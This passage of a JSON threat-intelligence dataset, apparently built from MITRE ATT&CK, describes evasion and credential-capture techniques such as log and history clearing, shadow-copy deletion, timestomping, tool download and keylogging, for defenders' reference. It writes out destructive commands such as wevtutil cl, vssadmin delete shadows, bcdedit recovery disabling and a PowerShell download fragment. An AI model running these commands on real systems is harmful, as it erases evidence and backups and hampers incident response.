"uuid": "b4f2b54c-d304-4e05-a813-69bc7e6fd1f3",
"value": "Implant Internal Image"
},
{
"description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>. \n\nAdversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.<sup>[[Microsoft PowerShell Command History](https://app.tidalcyber.com/references/6c873fb4-db43-4bad-b5e4-a7d45cbe796f)]</sup>\n\nAdversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.<sup>[[Sophos PowerShell command audit](https://app.tidalcyber.com/references/441f289c-7fdc-4cf1-9379-960be75c7202)]</sup><sup>[[Sophos PowerShell Command History Forensics](https://app.tidalcyber.com/references/9cff28da-c379-49e7-b971-7dccc72054fc)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "074cf118-cd7f-41c2-bb54-43380bfa45ca",
"value": "Clear Command History"
},
{
"description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:<sup>[[Linux Logs](https://app.tidalcyber.com/references/aa25e385-802c-4f04-81bb-bb7d1a7599ec)]</sup>\n\n* <code>/var/log/messages:</code>: General and system-related messages\n* <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs\n* <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records\n* <code>/var/log/kern.log</code>: Kernel logs\n* <code>/var/log/cron.log</code>: Crond logs\n* <code>/var/log/maillog</code>: Mail server logs\n* <code>/var/log/httpd/</code>: Web server access and error logs\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "2f32c30e-b79a-497a-b05f-ab8bd93aa689",
"value": "Clear Linux or Mac System Logs"
},
{
"description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)/[Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b), [Email Collection](https://app.tidalcyber.com/technique/3569b783-1be5-414b-adb9-42c47ceee1cc), [Mail Protocols](https://app.tidalcyber.com/technique/350fd3f9-2d62-498f-be62-fc4b9907ff02) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88). For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports.<sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[ExchangePowerShell Module](https://app.tidalcyber.com/references/8af67c2a-15e2-48c9-9ec2-b62ffca0f677)]</sup> On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code> or use [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) to interact with APIs on macOS.<sup>[[Cybereason Cobalt Kitty 2017](https://app.tidalcyber.com/references/bf838a23-1620-4668-807a-4354083d69b1)]</sup><sup>[[mailx man page](https://app.tidalcyber.com/references/6813a1a2-fbe0-4809-aad7-734997e59bea)]</sup>\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.008"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "64fd8f4d-5725-46c8-a37a-020a706db1e4",
"value": "Clear Mailbox Data"
},
{
"description": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\n\nNetwork connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under <sup>[[Microsoft RDP Removal](https://app.tidalcyber.com/references/367d3f80-9b13-44fa-938a-744a95518571)]</sup>:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers</code>\n\nWindows may also store information about recent RDP connections in files such as <code>C:\\Users\\\\%username%\\Documents\\Default.rdp</code> and `C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Terminal\nServer Client\\Cache\\`.<sup>[[Moran RDPieces](https://app.tidalcyber.com/references/794331fb-f1f2-4aaa-aae8-d1c4c95fb00f)]</sup> Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).<sup>[[Apple Culprit Access](https://app.tidalcyber.com/references/9254d3f5-7fc1-4710-b885-b0ddb3a3dca9)]</sup><sup>[[FreeDesktop Journal](https://app.tidalcyber.com/references/5ded9060-9a23-42dc-b13b-15e4e3ccabf9)]</sup><sup>[[Apple Unified Log Analysis Remote Login and Screen Sharing](https://app.tidalcyber.com/references/a2169171-8e4a-4faa-811c-98b6204a5a57)]</sup>\n\nMalicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://app.tidalcyber.com/technique/4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8) or tampering to enable [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.007"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "39d589f9-fa73-4988-95e2-2a022851d8b8",
"value": "Clear Network Connection History and Configurations"
},
{
"description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b), [Plist File Modification](https://app.tidalcyber.com/technique/ee177ad0-d282-42c0-91f9-7bcf724e3d31), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup> Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce)).<sup>[[Talos - Cisco Attack 2022](https://app.tidalcyber.com/references/143182ad-6a16-5a0d-a5c4-7dae721a9e26)]</sup>\n\nIn some instances, artifacts of persistence may also be removed once an adversarys persistence is executed in order to prevent errors with the new instance of the malware.<sup>[[NCC Group Team9 June 2020](https://app.tidalcyber.com/references/0ea8f87d-e19d-438d-b05b-30f2ccd0ea3b)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.009"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e6dac24d-672c-4cae-82e7-2bf21014633c",
"value": "Clear Persistence"
},
{
"description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* <code>wevtutil cl system</code>\n* <code>wevtutil cl application</code>\n* <code>wevtutil cl security</code>\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "fc34e661-55c3-47be-a368-c2f5776cdd17",
"value": "Clear Windows Event Logs"
},
{
"description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.<sup>[[Microsoft SDelete July 2016](https://app.tidalcyber.com/references/356c7d49-5abc-4566-9657-5ce58cf7be67)]</sup> Examples of built-in [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.004"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "d36695d0-e4ab-4b8a-9c65-bab3cc34ef2c",
"value": "File Deletion"
},
{
"description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) connections can be removed when no longer needed. [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) is an example utility that can be used to remove network share connections with the <code>net use \\\\system\\share /delete</code> command. <sup>[[Technet Net Use](https://app.tidalcyber.com/references/f761d4b6-8fc5-4037-aa34-7982c17f8bed)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.005"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "8325f2fd-35a3-4c0c-895d-7c82dd4ba2fb",
"value": "Network Share Connection Removal"
},
{
"description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to hide malware and tools.<sup>[[WindowsIR Anti-Forensic Techniques](https://app.tidalcyber.com/references/646211a7-77be-4e5a-bd02-eeb70d67113d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1070.006"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e8866e77-f0ca-4a19-b83e-d33dbafaf21b",
"value": "Timestomp"
},
{
"description": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversarys actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\n\nRemoval of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.",
"meta": {
"platforms": [
"Containers",
"Google Workspace",
"Linux",
"macOS",
"Network",
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "074cf118-cd7f-41c2-bb54-43380bfa45ca",
"type": "similar"
},
{
"dest-uuid": "2f32c30e-b79a-497a-b05f-ab8bd93aa689",
"type": "similar"
},
{
"dest-uuid": "64fd8f4d-5725-46c8-a37a-020a706db1e4",
"type": "similar"
},
{
"dest-uuid": "39d589f9-fa73-4988-95e2-2a022851d8b8",
"type": "similar"
},
{
"dest-uuid": "e6dac24d-672c-4cae-82e7-2bf21014633c",
"type": "similar"
},
{
"dest-uuid": "fc34e661-55c3-47be-a368-c2f5776cdd17",
"type": "similar"
},
{
"dest-uuid": "d36695d0-e4ab-4b8a-9c65-bab3cc34ef2c",
"type": "similar"
},
{
"dest-uuid": "8325f2fd-35a3-4c0c-895d-7c82dd4ba2fb",
"type": "similar"
},
{
"dest-uuid": "e8866e77-f0ca-4a19-b83e-d33dbafaf21b",
"type": "similar"
}
],
"uuid": "fa1507f1-c763-4af1-8bd9-a2fb8f7904be",
"value": "Indicator Removal"
},
{
"description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8). For example, [Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), Run window, or via scripts. <sup>[[VectorSec ForFiles Aug 2017](https://app.tidalcyber.com/references/8088d15d-9512-4d12-a99a-c76ad9dc3390)]</sup> <sup>[[Evi1cg Forfiles Nov 2017](https://app.tidalcyber.com/references/b292b85e-68eb-43c3-9b5b-222810e2f26a)]</sup>\n\nAdversaries may abuse these features for [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or file extensions more commonly associated with malicious payloads.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "91e79eb9-7f99-4890-8bef-9543d307206d",
"value": "Indirect Command Execution"
},
{
"description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043), and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.<sup>[[t1105_lolbas](https://app.tidalcyber.com/references/80e649f5-6c74-4d66-a452-4f4cd51501da)]</sup>\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.\n\nFiles can also be transferred using various [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s as well as native or otherwise present tools on the victim system.<sup>[[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)]</sup> In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "4499ce34-9871-4879-883c-19ddb940f242",
"value": "Ingress Tool Transfer"
},
{
"description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3).<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup> Furthermore, adversaries may disable recovery notifications, then corrupt backups.<sup>[[disable_notif_synology_ransom](https://app.tidalcyber.com/references/d53e8f89-df78-565b-a316-cf2644c5ed36)]</sup>\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>\n* [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>\n* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>\n* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>\n* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n\nOn network devices, adversaries may leverage [Disk Wipe](https://app.tidalcyber.com/technique/ea2b3980-05fd-41a3-8ab9-3106e833c821) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete “online” backups that are connected to their network whether via network storage media or through folders that sync to cloud services.<sup>[[ZDNet Ransomware Backups 2020](https://app.tidalcyber.com/references/301da9c8-60de-58f0-989f-6b504e3457a3)]</sup> In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.<sup>[[Dark Reading Code Spaces Cyber Attack](https://app.tidalcyber.com/references/e5a3028a-f4cc-537c-9ddd-769792ab33be)]</sup><sup>[[Rhino Security Labs AWS S3 Ransomware](https://app.tidalcyber.com/references/785c6b11-c5f0-5cb4-931b-cf75fcc368a1)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "d207c03b-fbe7-420e-a053-339f4650c043",
"value": "Inhibit System Recovery"
},
{
"description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.<sup>[[Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017](https://app.tidalcyber.com/references/2b0c16e3-9ea0-455e-ae01-18d9b388fea6)]</sup> Unlike [Keylogging](https://app.tidalcyber.com/technique/7f1798b5-b159-441b-a5ef-3b5c706e1699), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.<sup>[[Microsoft Hook Overview](https://app.tidalcyber.com/references/54997a52-f78b-4af4-8916-787bcb215ce1)]</sup><sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>\n* **Import address table (IAT) hooking**, which use modifications to a processs IAT, where pointers to imported API functions are stored.<sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup><sup>[[Adlice Software IAT Hooks Oct 2014](https://app.tidalcyber.com/references/9a0e7054-9239-43cd-8e5f-aac8b665be72)]</sup><sup>[[MWRInfoSecurity Dynamic Hooking 2015](https://app.tidalcyber.com/references/3cb6d0b1-4d6b-4f2d-bd7d-e4b2dcde081d)]</sup>\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.<sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup><sup>[[HighTech Bridge Inline Hooking Sept 2011](https://app.tidalcyber.com/references/39ad1769-3dfb-4572-ab82-1e0c4f869ec8)]</sup><sup>[[MWRInfoSecurity Dynamic Hooking 2015](https://app.tidalcyber.com/references/3cb6d0b1-4d6b-4f2d-bd7d-e4b2dcde081d)]</sup>\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1056.004"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "28fd13d1-b555-47fa-9d47-caf6b1367ace",
"value": "Credential API Hooking"
},
{
"description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.<sup>[[OSX Malware Exploits MacKeeper](https://app.tidalcyber.com/references/8c4bcbc7-ff52-4f7b-a22e-98bf9cfb1040)]</sup> This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701)<sup>[[LogRhythm Do You Trust Oct 2014](https://app.tidalcyber.com/references/88a84f9a-e077-4fdd-9936-30fc7b290476)]</sup><sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup><sup>[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup> and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).<sup>[[LogRhythm Do You Trust Oct 2014](https://app.tidalcyber.com/references/88a84f9a-e077-4fdd-9936-30fc7b290476)]</sup><sup>[[Enigma Phishing for Credentials Jan 2015](https://app.tidalcyber.com/references/7fff81f0-2b99-4f4f-8eca-c6a54c4d8205)]</sup><sup>[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup> On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7)).<sup>[[Spoofing credential dialogs](https://app.tidalcyber.com/references/4f8abaae-1483-4bf6-a79c-6a801ae5a640)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1056.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "40ac9bae-173e-467c-80f2-0c1513fc874d",
"value": "GUI Input Capture"
},
{
"description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.<sup>[[Talos Kimsuky Nov 2021](https://app.tidalcyber.com/references/17927f0e-297a-45ec-8e1c-8a33892205dc)]</sup>\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.<sup>[[Adventures of a Keystroke](https://app.tidalcyber.com/references/f29ed400-2986-4b2c-9b8a-7dde37562d22)]</sup> Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://app.tidalcyber.com/technique/28fd13d1-b555-47fa-9d47-caf6b1367ace), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.<sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1056.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "7f1798b5-b159-441b-a5ef-3b5c706e1699",
"value": "Keylogging"
},
{
"description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) and [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or as part of the initial compromise by exploitation of the externally facing web service.<sup>[[Volexity Virtual Private Keylogging](https://app.tidalcyber.com/references/b299f8e7-01da-4d59-9657-ef93cf284cc0)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1056.003"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "34674b83-86a7-4ad9-8b05-49b505aa5ef0",
"value": "Web Portal Capture"
},
{
